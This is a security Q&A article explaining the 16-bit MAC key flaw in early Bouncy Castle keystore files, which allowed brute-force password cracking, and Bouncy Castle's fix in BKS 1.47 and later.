James Steidl - Fotolia
Bouncy Castle is a collection of cryptographic APIs for Java and C#, but it was recently reported that some of the Bouncy Castle keystore files are vulnerable to hash collisions, which enable attackers to use brute force attacks to crack the cryptography behind C# and Java applications. How is this possible? What solutions has Bouncy Castle suggested?
Brute force cracking of the cryptography for C# and Java applications may be caused by a design flaw in the first version of the Bouncy Castle keystore (BKS) file of encryption keys. The flaw improperly determines the message authentication code (MAC) key size used to protect the data inside of the keystore where the key size is insufficient to prevent a hash collision attack against valid passwords.
In the BKS hashed MAC, an SHA-1 cryptographic hash function is 160 bits long. RFC 7292 on cryptographic algorithms specifies that the sizes of the MAC key and the hash function must be the same. The first version of the Bouncy Castle keystore files fails to meet this requirement if the MAC key size is 16 bits instead of the required 160 bits.
A 16-bit BKS file can have a repository of 65,536 different encryption keys -- meaning an attacker could write a simple password to crack the script to the brute force hash collisions. Furthermore, as computational power increases, attackers may find it easier to guess key values in seconds.
A CERT Coordination Center blogger at Carnegie Mellon University demonstrated how he created a brute force cracking tool with Python's pyjks library and saved the script as a Python file (crackbks.py). Upon execution, the file showed the password in plain view and the maximum size of the Bouncy Castle keystore password was found to be 16 bits.
Bouncy Castle has suggested using BKS version 1.47 or newer, as the default MAC key size of a BKS keystore file was increased from 16 bits to 160 bits to protect the keystore from hash collision attacks.
Ask the expert:
Want to ask Judith Myerson a question about security? Submit your question now via email. (All questions are anonymous.)
Dig Deeper on Alternative operating system security
Related Q&A from Judith Myerson
GE reported an improper authentication flaw in its PulseNet network management software for critical infrastructures. Discover how this flaw works ... Continue Reading
Researchers claim to have found a new attack against VMs that affects SEV technology. Expert Judith Myerson explains what this attack is and how it ... Continue Reading
The Wi-Fi Alliance released the updated WPA3 protocol, adding security enhancements to the Wi-Fi access process. Learn why enterprises should update ... Continue Reading
Have a question for an expert?
Please add a title for your question
Get answers from a TechTarget expert on whatever's puzzling you.